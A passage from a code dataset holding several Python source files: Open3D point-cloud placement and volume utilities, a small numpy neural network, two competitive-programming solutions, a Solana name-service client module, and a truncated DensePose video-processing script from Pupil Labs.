self.prompt_box.translate(good_config[2]*side_step*self.direction_z.unit)\n\n return self.prompt_box\n\n def crop_box(self):\n self.pcd = self.pcd.crop(self.obbox)\n\n def viz(self, pcd = True, obbox = True, item = True, direction = True, place_box = True):\n vis = o3d.visualization.Visualizer()\n vis.create_window()\n if self.pcd and pcd:\n vis.add_geometry(self.pcd)\n if self.obbox and 
obbox:\n            vis.add_geometry(self.obbox)\n        if item and len(self.items):\n            for it in self.items:\n                if it.pcd:\n                    vis.add_geometry(it.pcd)\n                if it.mesh_pcd:\n                    vis.add_geometry(it.mesh_pcd)\n        if self.direction_x is not None and direction:\n            red_color = np.array([255, 0, 0])\n            length = math.sqrt(np.sum((self.direction_x.start - self.direction_x.end) ** 2))\n            arrow = o3d.geometry.TriangleMesh.create_arrow(0.01, 0.015, length, 0.04)\n            arrow.paint_uniform_color(red_color / 255)\n            arrow.rotate(self.direction_x.rotation, center = [0,0,0])\n            arrow.translate(self.direction_x.translation)\n            vis.add_geometry(arrow)\n        if self.direction_y is not None and direction:\n            green_color = np.array([0, 255, 0])\n            length = math.sqrt(np.sum((self.direction_y.start - self.direction_y.end) ** 2))\n            arrow = o3d.geometry.TriangleMesh.create_arrow(0.01, 0.015, length, 0.04)\n            arrow.paint_uniform_color(green_color / 255)\n            arrow.rotate(self.direction_y.rotation, center = [0,0,0])\n            arrow.translate(self.direction_y.translation)\n            vis.add_geometry(arrow)\n        if self.direction_z is not None and direction:\n            blue_color = np.array([0, 0, 255])\n            length = math.sqrt(np.sum((self.direction_z.start - self.direction_z.end) ** 2))\n            arrow = o3d.geometry.TriangleMesh.create_arrow(0.01, 0.015, length, 0.04)\n            arrow.paint_uniform_color(blue_color / 255)\n            arrow.rotate(self.direction_z.rotation, center = [0,0,0])\n            arrow.translate(self.direction_z.translation)\n            vis.add_geometry(arrow)\n        if place_box:\n            vis.add_geometry(self.prompt_box)\n        opt = vis.get_render_option()\n        opt.show_coordinate_frame = True\n        vis.run()\n        vis.destroy_window()\n\nclass package:\n    def __init__(self) -> None:\n        self.mesh_pcd = None\n        self.pcd = None\n        self.volume = 0\n        self.obbox = None\n\n    def load_from_mesh(self, path):\n        self.mesh_pcd = o3d.io.read_triangle_mesh(path)\n        self.mesh_pcd.paint_uniform_color(np.array([0, 255, 0]))\n        pcd = o3d.geometry.PointCloud()\n        pcd.points = o3d.utility.Vector3dVector(np.asarray(self.mesh_pcd.vertices))\n        self.mesh_pcd = pcd\n\n    def get_obbox(self):\n        self.obbox = o3d.geometry.OrientedBoundingBox.create_from_points(self.pcd.points)\n        self.obbox.color = [1,0,1]\n\n\n    def load_pcd(self, pcd):\n        self.pcd = pcd\n\n    def cal_vlm(self, transform, grid_size = 0.000005):\n        local_pcd = copy.deepcopy(self.pcd)\n        local_pcd.transform(transform)\n        print(\"getting {} points\".format(np.array(local_pcd.points).shape[0]))\n\n        # vis = o3d.visualization.Visualizer()\n        # vis.create_window()\n        # vis.add_geometry(local_pcd)\n        # x = o3d.geometry.TriangleMesh.create_sphere(radius=0.00002)\n        # green_color = np.array([0, 255, 0])\n        # x.paint_uniform_color(green_color / 255)\n        # vis.add_geometry(x)\n        # opt = vis.get_render_option()\n        # vis.run()\n        # vis.destroy_window()\n\n        pt_max = local_pcd.get_max_bound()\n        pt_min = local_pcd.get_min_bound()\n        print(\"max {}, min {}\".format(pt_max, pt_min))\n        print(\"getting {} points\".format(np.array(local_pcd.points).shape[0]))\n        x_size = int((pt_max[0] - pt_min[0]) / grid_size) + 1\n        y_size = int((pt_max[1] - pt_min[1]) / grid_size) + 1  # parenthesize the extent before dividing (the original divided only pt_min[1])\n        volume = 0\n        grid_count = 0\n        grid_avg_z = 0\n        point_count = 0\n        print(\"Total grid {} x_size: {} y_size: {}\".format(x_size * y_size, x_size, y_size))\n        for i in range(0, x_size):\n            for j in range(0, y_size):\n                min_bound = [pt_min[0]+i*grid_size, pt_min[1]+j*grid_size, -0.001]\n                max_bound = [pt_min[0]+(i+1)*grid_size, pt_min[1]+(j+1)*grid_size, pt_max[2]*5]\n                bbox = o3d.geometry.AxisAlignedBoundingBox(min_bound, max_bound)\n                temp_points = np.array(local_pcd.crop(bbox).points)\n                
point_count += temp_points.shape[0]\n                if temp_points.shape[0] > 0:\n                    avg = np.average(temp_points, axis = 0)\n                    grid_avg_z += avg[2]\n                    volume += grid_size * grid_size * avg[2] * 1e9\n                    grid_count += 1\n        print(\"Grids in use {} avg_z(mm) {} point_sum {}\".format(grid_count, grid_avg_z/grid_count*1000, point_count))\n        return volume\n\n    def viz(self):\n        vis = o3d.visualization.Visualizer()\n        vis.create_window()\n        if self.pcd:\n            vis.add_geometry(self.pcd)\n        if self.mesh_pcd:\n            vis.add_geometry(self.mesh_pcd)\n        if self.obbox:\n            vis.add_geometry(self.obbox)\n\n        r = o3d.geometry.TriangleMesh.create_sphere(radius=0.02)\n        r.translate([1, 0, 0])\n        r.paint_uniform_color([1,0,0])\n        vis.add_geometry(r)\n        g = o3d.geometry.TriangleMesh.create_sphere(radius=0.02)\n        g.translate([0, 1, 0])\n        g.paint_uniform_color([0,1,0])\n        vis.add_geometry(g)\n        b = o3d.geometry.TriangleMesh.create_sphere(radius=0.02)\n        b.translate([0, 0, 1])\n        b.paint_uniform_color([0,0,1])\n        vis.add_geometry(b)\n        y = o3d.geometry.TriangleMesh.create_sphere(radius=0.02)\n        y.translate([0, 0, 0])\n        y.paint_uniform_color([0,1,1])\n        vis.add_geometry(y)\n\n\n        opt = vis.get_render_option()\n        # opt.show_coordinate_frame = False\n        vis.run()\n        vis.destroy_window()","repo_name":"ZerenYu/SheetPickup","sub_path":"scripts/placement_util.py","file_name":"placement_util.py","file_ext":"py","file_size_in_byte":13324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26419620680","text":"import numpy as np\n\n\"\"\"\n    vectorized sigmoid function\n\"\"\"\n@np.vectorize\ndef sigmoid(x):\n    return 1 / (1 + np.exp(-x))\n\n\"\"\"\n    vectorized tanh function\n\"\"\"\n@np.vectorize\ndef tanh(x):\n    return np.tanh(x)\n\n\"\"\"\n    vectorized LeakyReLU\n\"\"\"\n@np.vectorize\ndef leakyReLU(x, k = 0.05):\n    return x if x > 0 else x * k\n\n\"\"\"\n    vectorized sigmoid_prime\n\"\"\"\n@np.vectorize\ndef sigmoid_prime(x):\n    return x * (1.0 - x)\n\n\"\"\"\n    vectorized tanh_prime\n\"\"\"\n@np.vectorize\ndef tanh_prime(x):\n    return 1.0 - np.square(np.tanh(x))\n\n\"\"\"\n    vectorized leakyReLU prime\n\"\"\"\n@np.vectorize\ndef leakyReLu_prime(x, k = 0.05):\n    return k if x < 0 else 1.0\n\nactivation_function = tanh\nactivation_function_prime = tanh_prime\n\n\n\"\"\"\n    vectorized softmax function (no @np.vectorize here: applying it\n    element-wise would collapse exp(x)/exp(x).sum() to all ones)\n\"\"\"\ndef softmax(x):\n    return np.exp(x) / np.exp(x).sum()\n\n\n\"\"\"\n    simple random value generator\n\"\"\"\nfrom scipy.stats import truncnorm\ndef truncated_normal(mean = 0, sd = 1, low = 0, upp = 10):\n    return truncnorm((low - mean) / sd, (upp - mean) / sd, loc = mean, scale = sd)\n\n\"\"\"\n    Euclidean loss function\n\"\"\"\ndef loss(output, target):\n    return np.sum((target - output)**2)\n\nclass NeuralNetwork:\n\n    \"\"\"\n    pre - layers = array of node-count for each layer in the NN\n          len(layers) > 2\n          layers[0] >= 2\n          learning_rate = rate used in training\n          learning_rate != 0\n    post - initialize local variables, call initialize_net()\n    \"\"\"\n    def __init__(self, layers, learning_rate):\n        self.layers = layers\n        self.learning_rate = learning_rate\n        self.initialize_net()\n\n    \"\"\"\n    Initializes the neural network with given input/output and hidden layers.\n    For matrix implementation, this means to initialize the weight matrices.\n    For now, hidden layers step in size from input_size down to output_size.\n    pre - layers[0] > layers[len(layers) - 1]\n    post - initialized weight_matrices with random values\n    \"\"\"\n    def initialize_net(self):\n        
self.weight_matrices = []\n        #calculate average deviation\n        rad = 1 / np.sqrt(self.layers[0])\n        #create rv_continuous object (random variates)\n        W = truncated_normal(mean = 2, sd = 1, low = -rad, upp = rad)\n        for i in range(len(self.layers) - 1):\n            #use W to generate random value matrices, dim = layer[i + 1] x layer[i] + 1 for bias\n            self.weight_matrices.append(np.array(W.rvs((self.layers[i + 1], \n                self.layers[i] + 1))))\n        print(\"Initializing weight matrices to random values\\n\")\n\n    \"\"\"\n    Train the neural network with a single input/target_vector pair\n    vectors can be tuples, lists, or ndarray\n    \"\"\"\n    def train(self, input_vector, target_vector):\n        #turning arrays into column vectors\n        target_vector = np.array(target_vector, ndmin=2).T\n        output_mat = self.run(input_vector)\n        output_vector = output_mat[-1]\n        input_vector = np.array(input_vector, ndmin=2).T\n\n        #implement backpropagation\n        dE_do = output_vector - target_vector #[out x 1] vector\n        dW = self.back_propagation(dE_do, output_mat, dW = [])\n\n        #update weights\n        for i in range(len(dW)):\n            #print(\"dW = %s, W = %s\" %(dW[i].shape, self.weight_matrices[i].shape))\n            self.weight_matrices[i] += dW[i] * (-1) * self.learning_rate\n\n        #return loss\n        return loss(output_vector, target_vector)\n\n    \"\"\"\n    Performs back-propagation on the network recursively\n    dW = matrix of dW for each ***neuron***\n    dE_do = partial derivative of error in terms of the sigmoid(o)\n    output_mat = matrix of outputs for each layer it went through\n    Base case: dW = [], dErr_do = (y - t).\n        This happens when we are finding error for the weights\n        leading to the output, or the last matrix\n    Recursive case: dW = [some matrix], dE_do = dW_vector from layer after\n        This happens for every intermediate layer + input layer\n\n    \"\"\"\n    def back_propagation(self, dErr_do, output_mat, i = 1, dW = None):\n        #avoid a mutable default argument; start a fresh list when none is given\n        if dW is None:\n            dW = []\n        dW_mat = []\n\n        #current\n        output_vector = output_mat[-(i)]\n        #remove bias from calculation\n        if(i != 1):\n            output_vector = np.delete(output_vector, -1, axis = 0)\n        #partial of current layer in terms of activation function\n        do_dnet = activation_function_prime(output_vector)\n        #do_dnet = output_vector * ( 1 - output_vector )\n        #neuron value on layer before\n        dnet_dw = output_mat[-(i + 1)] \n        #calculate weights for current layer\n        #dE/dw = dE/do o do/dnet x (dnet/dw).T\n        #print(\"dErr_do = %s, do_dnet = %s, dnet_dw = %s\\n\" %(dErr_do.shape, do_dnet.shape, dnet_dw.shape,))\n        dW_mat = (dErr_do * do_dnet).dot(dnet_dw.T)\n        #dW_mat should have same dimensions as weight_matrices[i->j]\n\n        #insert calculated dw\n        dW.insert(0, dW_mat)\n\n        #recurse if i < len(output_mat) --> 1+ weight matrix left\n        if(i + 1 < len(output_mat)):\n            #prepare dErr_do for next recursive call\n            #weights from prev layer j to all nodes this layer except the bias column\n            wnetl = np.array(np.sum(np.delete(self.weight_matrices[-(i)], -1, axis=1), axis=0), ndmin=2).T\n            #print(\"dErr_do = %s, do_dnet = %s, dnet_dw = %s\\n\" %(dErr_do.shape, do_dnet.shape, wnetl.shape,))\n            #hadamard multiply dErr/doL o doL/dnetL o wnetL\n            dErr_do = np.sum(dErr_do * do_dnet) * wnetl\n            dW = self.back_propagation(dErr_do, output_mat, i+1, dW)\n\n        return dW\n\n    \"\"\"\n    trains the network for a fixed number of epochs or until it reaches a loss threshold\n    train = [ \n        [[inputa1, inputa2...],[inputb1, inputb2...],...] , \n        [[targeta1,targeta2,...],[targetb1,targetb2,...],...] 
\n    ]\n    if n_epochs = 0, runs until error is below threshold, else run max n_epoch times or\n    until error reaches threshold\n    \"\"\"\n    def train_network(self, train, n_epochs = 0, threshold=0.1):\n        epochs = 0\n        print(\"Starting to train for %d, or when the error is below %.3f\\n\\n\" %(n_epochs, threshold))\n        while 1:\n            #reset sumError\n            sumError = 0\n\n            #train for each training set\n            for i in range(len(train[0])):\n                sumError += self.train(train[0][i], train[1][i])\n            sumError /= (len(train[0]))\n\n            #check if sumError is less than threshold or if n_epochs exceeded\n            if (n_epochs != 0 and epochs >= n_epochs) or sumError <= threshold:\n                break\n            print(\"Epochs = %d, Error = %.7f\" %(epochs, sumError))\n            epochs += 1\n        print(\"Finished training\\n n_epochs = %d\\n sumError = %.5f\\n\\n\" %(epochs, sumError))\n\n    \"\"\"\n    Run the network with an input vector\n    input_vector can be a tuple, list, or ndarray\n    pre - len(input_vector) == layers[0]\n          len(input_vector) >= 2\n    post - output_vector calculated from weight_matrices\n    \"\"\"\n    def run(self, input_vector):\n        #turning array into column vectors\n        output_vector = np.array(input_vector, ndmin=2).T\n        #add bias to input\n        output_vector = np.vstack((output_vector,np.array([1])))\n        output_mat = [output_vector]\n        for i in range(len(self.weight_matrices)):\n\n            #matrix multiplying for each weight matrix\n            output_vector = self.weight_matrices[i].dot(output_vector)\n            #passing result through the activation function\n            output_vector = activation_function(output_vector)\n            #output_vector = reLU(output_vector)\n            if i != len(self.weight_matrices) - 1:\n                #add bias to input\n                output_vector = np.vstack((output_vector,np.array([1])))\n            #add calculated vector to matrix\n            output_mat.append(output_vector)\n        return output_mat\n\n\n    \"\"\"\n    user-call method for running the Neural net for given input\n    \"\"\"\n    def predict(self, input):\n        out = self.run(input)\n        return out[-1]\n\n    def get_network(self):\n        return self.weight_matrices\n\n    def load_network(self, W):\n        self.weight_matrices = W\n\nif __name__ == \"__main__\":\n    nn = NeuralNetwork(layers = [5, 4, 3], learning_rate = 0.1)\n    nn.train_network([[[1, 2, 3, 4, 5]], [[1, 0, 1]]], n_epochs=100)\n    # train_network returns None, so report the trained prediction instead\n    print(\"Out : \", nn.predict([1, 2, 3, 4, 5]))\n","repo_name":"harennon/neural-net","sub_path":"src/NeuralNet.py","file_name":"NeuralNet.py","file_ext":"py","file_size_in_byte":8626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6274520131","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 26 23:51:35 2022\r\n\r\n@author: salma obeidat\r\n\"\"\"\r\n\r\nt=int(input())\r\nfor _ in range(t):\r\n    n=int(input())\r\n    a=list(map(int,input().split()))\r\n    odd=0\r\n    for i in range(len(a)):\r\n        if(a[i]%2!=0):\r\n            odd+=1\r\n    if(odd==n):\r\n        print(\"YES\")\r\n    else:\r\n        print(\"NO\")\r\n\r\n# The sum of an even and an odd number is odd, so the 2n given numbers can be\r\n# split into n pairs with odd sums exactly when there are n even numbers and\r\n# n odd numbers.","repo_name":"salmaobeidat/code-forces","sub_path":"1542A - Odd Set.py","file_name":"1542A - Odd Set.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"26106163059","text":"import sys\nfrom collections import deque\n\n\ndef bfs(N, K, check):\n    q = deque()\n    q.append((N, 0))\n    check[N] = True\n\n    while q:\n        N, time = q.popleft()\n        if N == K:\n            return time\n        for next in [N - 1, N + 1, N * 2]:\n            if 0 <= next < 100001 and not check[next]:\n                
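# Editorial note on the NeuralNet record above: the weight update is plain
# gradient descent, W <- W - eta * dE/dW, which is exactly what
# self.weight_matrices[i] += dW[i] * (-1) * self.learning_rate computes.
# A standalone illustration of the same rule (all values hypothetical):
#
#     import numpy as np
#     eta = 0.1
#     W = np.ones((2, 2))
#     dW = np.array([[0.5, -0.5], [0.25, 0.0]])
#     W -= eta * dW  # the same update, written directly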
q.append((next, time + 1))\n check[next] = True\n\n\ndef solution():\n N, K = map(int, sys.stdin.readline().split())\n check = [False] * 200001\n\n print(bfs(N, K, check))\n\n\nsolution()\n","repo_name":"Kwakcena/codeplus-SW-competency","sub_path":"그래프/숨바꼭질/baekjoon-1697.py","file_name":"baekjoon-1697.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19350529270","text":"\"\"\"\nHigh level interface for all Solana-related interactions with SPL Name Service.\n\nSome of these are nothing but cleaned up output to RPC calls.\nOthers are actual blockchain transactions with potentially\nmany RPC calls to acquire necessary data for those transactions.\n\nAt a high level, this is the CRUD interface of our SPLNS \"databasing\".\n\"\"\"\nfrom base64 import b64decode\nfrom typing import Optional, Union, Any\n\nfrom solana.rpc.api import Client\nfrom solana.rpc.exception import SolanaException\nfrom solana.account import Account\nfrom solana.publickey import PublicKey\nfrom solana.transaction import Transaction\nfrom solana.system_program import SYS_PROGRAM_ID\n\nfrom sol_namespace.name_model import NamespaceNode\nfrom sol_namespace import instruction\n\n\nTxId = str\nRawTx = bytes\nOperation = Union[TxId, RawTx]\n\n\ndef create(\n client: Client,\n name: NamespaceNode,\n funder: Account,\n *signers: Account,\n populate: bool=True,\n raw: bool=False\n ) -> Optional[Operation]:\n \"\"\"\n Create a name account on chain. By default, also populate it with data.\n\n Optionally, return a signed raw transaction instead of directly sending it.\n \"\"\"\n tx = Transaction()\n tx.add(instruction.create_instruction(name))\n if populate:\n tx.add(instruction.update_instruction(name))\n if raw:\n tx.recent_blockhash = client.get_recent_blockhash()['result']['value']['blockhash']\n tx.sign(funder)\n for signer in signers:\n tx.sign(signer)\n return tx.serialize()\n # Otherwise just send the transaction\n try:\n response = client.send_transaction(tx, funder)\n except SolanaException as e:\n logs = e.data.get('data', {}).get('logs', [])\n # TODO More efficient/informative error parsing here\n if 'Program log: Instruction: Create' in logs and \\\n 'Program log: The given name account already exists.' 
in logs:\n print(\"Error -- Name Create: name account already exists\")\n return None\n return response['result']\n\n\ndef update(\n client: Client,\n name: NamespaceNode,\n signer: Account,\n raw=False) -> Optional[Operation]:\n \"\"\"\n Repopulate the entirety of the data under a name account.\n\n Optionally, return a signed raw transaction instead of directly sending it.\n \"\"\"\n # Ensure the correct signer is passed in\n if name.class_account != SYS_PROGRAM_ID:\n assert signer.public_key() == name.class_account\n else:\n assert signer.public_key() == name.owner_account\n tx = Transaction()\n tx.add(instruction.update_instruction(name))\n if raw:\n tx.recent_blockhash = client.get_recent_blockhash()['result']['value']['blockhash']\n tx.sign(signer)\n return tx.serialize()\n\n response = client.send_transaction(tx, signer)\n return response['result']\n\n\ndef update_bytes(\n client: Client,\n name: NamespaceNode,\n signer: Account,\n input_data: bytes,\n offset: int=0,\n raw=False) -> Optional[Operation]:\n \"\"\"\n Custom update to the data under a name account.\n Requires specifying the starting offset byte-index, and the raw bytes to write.\n\n Signer is either the owner of the account, or the class account if it's not\n default.\n \"\"\"\n # Ensure the correct signer is passed in\n if name.class_account != SYS_PROGRAM_ID:\n assert signer.public_key() == name.class_account\n else:\n assert signer.public_key() == name.owner_account\n tx = Transaction()\n tx.add(instruction.update_instruction(name, offset=offset, input_data=input_data))\n if raw:\n tx.recent_blockhash = client.get_recent_blockhash()['result']['value']['blockhash']\n tx.sign(signer)\n return tx.serialize()\n\n response = client.send_transaction(tx, signer)\n return response['result']\n\n\ndef delete_name(\n client: Client,\n name: NamespaceNode,\n signer: Account, # must correspond to name.owner_account\n refund_to: PublicKey=None,\n raw: bool=False) -> Optional[Operation]:\n \"\"\"\n Delete a namespace node.\n \"\"\"\n assert name.owner_account == signer.public_key(), \"Must sign name deletion with account owner.\"\n tx = Transaction()\n tx.add(instruction.delete_instruction(name, refund_to=refund_to))\n if raw:\n tx.recent_blockhash = client.get_recent_blockhash()['result']['value']['blockhash']\n tx.sign(signer)\n return tx.serialize()\n\n response = client.send_transaction(tx, signer)\n return response['result']\n\n\ndef transfer_name(\n client: Client,\n name: NamespaceNode,\n new_owner: PublicKey,\n signer: Account, # must correspond to name.owner_account\n class_account_signer: Account=None,\n raw: bool=False) -> Optional[Operation]:\n \"\"\"\n Transfer a namespace node to a new owner.\n \"\"\"\n tx = Transaction()\n tx.add(instruction.transfer_instruction(name, new_owner=new_owner))\n if raw:\n tx.recent_blockhash = client.get_recent_blockhash()['result']['value']['blockhash']\n tx.sign(signer)\n if class_account_signer is not None:\n assert name.class_account != SYS_PROGRAM_ID, \"Invalid name class account signer\"\n tx.sign(class_account_signer)\n return tx.serialize()\n\n if class_account_signer is not None:\n assert name.class_account != SYS_PROGRAM_ID, \"Cannot specify class account signer on this name\"\n response = client.send_transaction(tx, signer, class_account_signer)\n else:\n response = client.send_transaction(tx, signer)\n return response['result']\n\n\n\ndef get_name_data(client: Client, name: NamespaceNode) -> Any:\n \"\"\"\n Look up account data, deserialize it.\n \"\"\"\n response = 
client.get_account_info(name.account, encoding='jsonParsed')\n    value = response['result']['value']\n    if value is None:\n        print(f\"{name.account} not found\")\n        return None\n    data = value['data'][0]\n    data = b64decode(data)\n    data = data[96:]\n    return type(name.data).deserialize(data)\n\n\nSOL_PRICE_USD = 40\nBASE_AMT = 89088 # Minimum rent-exempt balance for accounts with no extra data allocation.\nPER_BYTE = 696 # at 348 lamports per byte-year\nLAMPORTS_PER_SOL = 1000000000 # 10**9 lamports = 1 SOL (the original said 100 million, which is off by 10x)\n\ndef estimate_cost(\n    n_bytes: int,\n    sol_price_usd: float=SOL_PRICE_USD\n    ) -> float:\n    \"\"\"\n    Estimate dollar value of minimum rent-exempt balance\n    to store `n_bytes` in a Solana account.\n    \"\"\"\n    return sol_price_usd * (BASE_AMT + (n_bytes * PER_BYTE)) / LAMPORTS_PER_SOL\n","repo_name":"Auguron/sol_namespace","sub_path":"sol_namespace/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":6629,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"21574688515","text":"import argparse\nimport glob\nimport logging\nimport os\nimport struct\nfrom fractions import Fraction\n\nimport av\nimport cv2\nimport numpy as np\nimport pandas as pd\nfrom pupil_labs.dynamic_content_on_rim.uitools.ui_tools import get_path, get_savedir\nfrom pupil_labs.dynamic_content_on_rim.video.read import get_frame, read_video_ts\nfrom rich.logging import RichHandler\nfrom rich.progress import Progress\n\nimport pupil_labs.dense_pose.pose as pose\nimport pupil_labs.dense_pose.vis as pl_dp_vis\nfrom pupil_labs.dense_pose.parser import init_parser\n\nlogging.basicConfig(\n    format=\"%(message)s\",\n    datefmt=\"[%X]\",\n    level=logging.INFO,\n    handlers=[RichHandler(rich_tracebacks=True)],\n)\nlogger = logging.getLogger()\n\n# Check that we are running on a 64-bit architecture\nverbit = struct.calcsize(\"P\") * 8\nif verbit != 64:\n    error = \"Sorry, this script only works on 64 bit systems!\"\n    raise Exception(error)\n\n\n# Main call function\ndef main(args=None):\n    if args is None:\n        # Parse arguments\n        parser = init_parser()\n        args = parser.parse_args()\n    logging.info(\n        \"[white bold on #0d122a]◎ DensePose Module by Pupil Labs[/]\",\n        extra={\"markup\": True},\n    )\n    logging.info(\n        \"[white bold on #4267B2]∞ Using detectron's libraries by Meta AI[/]\",\n        extra={\"markup\": True},\n    )\n    if args.override:\n        logging.info(\n            \"[white bold on red]⚠️ Running in override mode, this is not officially supported ⚠️[/]\",\n            extra={\"markup\": True},\n        )\n    logging.info(f\"Arguments: {args}\")\n    if args.input_path is None:\n        args.input_path = get_path(\n            \"Select the video folder in the raw directory\", \"world_timestamps.csv\", None\n        )\n    logging.info(f\"Input path: {args.input_path}\")\n\n    # Format to read timestamps\n    oftype = {\"timestamp [ns]\": np.uint64}\n\n    # Read the timestamps\n    world_timestamps_df = pd.read_csv(\n        os.path.join(args.input_path, \"world_timestamps.csv\"), dtype=oftype\n    )\n    if not args.override:\n        events_df = pd.read_csv(\n            os.path.join(args.input_path, \"events.csv\"), dtype=oftype\n        )\n        gaze_df = pd.read_csv(os.path.join(args.input_path, \"gaze.csv\"), dtype=oftype)\n        files = glob.glob(os.path.join(args.input_path, \"*.mp4\"))\n        if len(files) != 1:\n            error = \"There should be only one video in the raw folder!\"\n            raise Exception(error)\n        video_path = files[0]\n    else:\n        events_df = pd.read_csv(\n            os.path.join(args.input_path, \"annotations.csv\"), dtype=oftype\n        )\n        gaze_df = pd.read_csv(\n            os.path.join(args.input_path, 
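# Editorial note on estimate_cost in the sol_namespace record above: a worked
# example with the module's constants (after correcting LAMPORTS_PER_SOL to
# 10**9): storing 1024 bytes needs 89088 + 1024 * 696 = 801792 lamports,
# i.e. 801792 / 10**9 ~= 0.0008 SOL, or about $0.032 at the assumed $40/SOL
# price.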
\"gaze_positions.csv\"), dtype=oftype\n )\n video_path = os.path.join(args.input_path, \"world.mp4\")\n\n # Read the video\n logging.info(\n \"[white bold on #0d122a]Reading video...[/]\",\n extra={\"markup\": True},\n )\n _, frames, pts, ts = read_video_ts(video_path)\n logging.info(\n \"[white bold on #0d122a]Reading audio...[/]\",\n extra={\"markup\": True},\n )\n with av.open(video_path) as v:\n if not v.streams.audio:\n logging.warning(\"No audio stream found!\")\n audio_stream_available = False\n else:\n audio_stream_available = True\n\n if audio_stream_available:\n _, audio_frames, audio_pts, audio_ts = read_video_ts(\n video_path, audio=True, auto_thread_type=False\n )\n ts = (\n world_timestamps_df[\"timestamp [ns]\"]\n if not args.override\n else world_timestamps_df[\"# timestamps [seconds]\"]\n )\n if args.override:\n logging.info(\n \"[white bold on red]Renaming some columns...[/]\",\n extra={\"markup\": True},\n )\n gaze_df.rename(\n {\n \"gaze_timestamp\": \"timestamp [ns]\",\n \"norm_pos_x\": \"gaze x [px]\",\n \"norm_pos_y\": \"gaze y [px]\",\n },\n axis=1,\n inplace=True,\n )\n gaze_df[\"timestamp [ns]\"] = gaze_df[\"timestamp [ns]\"].map(lambda x: x * 1e9)\n ts = ts * 1e9\n events_df.rename(\n {\n \"timestamp\": \"timestamp [ns]\",\n \"label\": \"name\",\n },\n axis=1,\n inplace=True,\n )\n events_df[\"timestamp [ns]\"] = events_df[\"timestamp [ns]\"].map(lambda x: x * 1e9)\n\n video_df = pd.DataFrame(\n {\n \"frames\": np.arange(frames),\n \"pts\": [int(pt) for pt in pts],\n \"timestamp [ns]\": ts,\n }\n )\n if audio_stream_available:\n audio_ts = audio_ts + ts[0]\n audio_df = pd.DataFrame(\n {\n \"frames\": np.arange(audio_frames),\n \"pts\": [int(pt) for pt in audio_pts],\n \"timestamp [ns]\": audio_ts,\n }\n )\n logging.info(\"Merging dataframes\")\n merged_video = pd.merge_asof(\n video_df,\n gaze_df,\n on=\"timestamp [ns]\",\n direction=\"nearest\",\n suffixes=[\"video\", \"gaze\"],\n )\n if audio_stream_available:\n merged_audio = pd.merge_asof(\n audio_df,\n video_df,\n on=\"timestamp [ns]\",\n direction=\"nearest\",\n suffixes=[\"audio\", \"video\"],\n )\n # Chop, chop, chop! 
(use only the in between events data)\n if args.start != \"recording.begin\":\n logging.info(f\"Looking for start event: {args.start}\")\n if not events_df[\"name\"].isin([args.start]).any():\n raise Exception(\"Start event not found!\")\n else:\n start = events_df[events_df[\"name\"] == args.start][\"timestamp [ns]\"].values[\n 0\n ]\n merged_video = merged_video[merged_video[\"timestamp [ns]\"] >= start]\n if audio_stream_available:\n merged_audio = merged_audio[merged_audio[\"timestamp [ns]\"] >= start]\n logging.info(f\"Starting at {args.start}\")\n if args.end != \"recording.end\":\n logging.info(f\"Looking for end event: {args.end}\")\n if not events_df[\"name\"].isin([args.end]).any():\n raise Exception(\"End event not found!\")\n else:\n end = events_df[events_df[\"name\"] == args.end][\"timestamp [ns]\"].values[0]\n merged_video = merged_video[merged_video[\"timestamp [ns]\"] <= end]\n if audio_stream_available:\n merged_audio = merged_audio[merged_audio[\"timestamp [ns]\"] <= end]\n logging.info(f\"Ending at {args.end}\")\n\n # Read first frame\n with av.open(video_path) as vid_container:\n logging.info(\"Reading first frame\")\n vid_frame = next(vid_container.decode(video=0))\n if audio_stream_available:\n aud_frame = next(vid_container.decode(audio=0))\n\n num_processed_frames = 0\n\n if args.override:\n logging.info(\"Geting gaze coordinates on image from normalized coordinates\")\n merged_video[\"gaze x [px]\"] = merged_video[\"gaze x [px]\"].map(\n lambda x: x * vid_frame.width\n )\n merged_video[\"gaze y [px]\"] = merged_video[\"gaze y [px]\"].map(\n lambda y: (1 - y) * vid_frame.height\n )\n\n # Get the output path\n if args.output_path is None:\n args.output_file = get_savedir(None, type=\"video\")\n args.out_csv = args.output_file.replace(\n os.path.split(args.output_file)[1], \"densepose.csv\"\n )\n args.output_path = os.path.split(args.output_file)[0]\n else:\n args.output_file = os.path.join(args.output_path, \"densepose.mp4\")\n args.out_csv = os.path.join(args.output_path, \"densepose.csv\")\n logging.info(f\"Output path: {args.output_file}\")\n\n # Get the model ready\n predictor, visualizer, extractor, cfg = pose.setup_config(\n args.confidence, args.device\n )\n\n # Here we go!\n with av.open(video_path) as video, av.open(video_path) as audio, av.open(\n args.output_file, \"w\"\n ) as out_container:\n logging.info(\"Ready to process video\")\n # Prepare the output video\n out_video = out_container.add_stream(\"libx264\", rate=30, options={\"crf\": \"18\"})\n out_video.width = video.streams.video[0].width\n out_video.height = video.streams.video[0].height\n out_video.pix_fmt = \"yuv420p\"\n out_video.codec_context.time_base = Fraction(1, 30)\n if audio_stream_available:\n out_audio = out_container.add_stream(\"aac\", layout=\"stereo\")\n out_audio.rate = audio.streams.audio[0].rate\n out_audio.time_base = out_audio.codec_context.time_base\n lpts = -1\n # For every frame in the video\n with Progress() as progress_bar:\n video_task = progress_bar.add_task(\n \"📹 Processing video\", total=merged_video.shape[0]\n )\n poses_task = progress_bar.add_task(f\"🤸‍♀️ Estimating poses\")\n while num_processed_frames < merged_video.shape[0]:\n row = merged_video.iloc[num_processed_frames]\n # Get the frame\n vid_frame, lpts = get_frame(video, int(row[\"pts\"]), lpts, vid_frame)\n if vid_frame is None:\n break\n img_original = vid_frame.to_ndarray(format=\"rgb24\")\n # Prepare the frame\n frame = cv2.cvtColor(img_original, cv2.COLOR_RGB2BGR)\n frame = np.asarray(frame, 
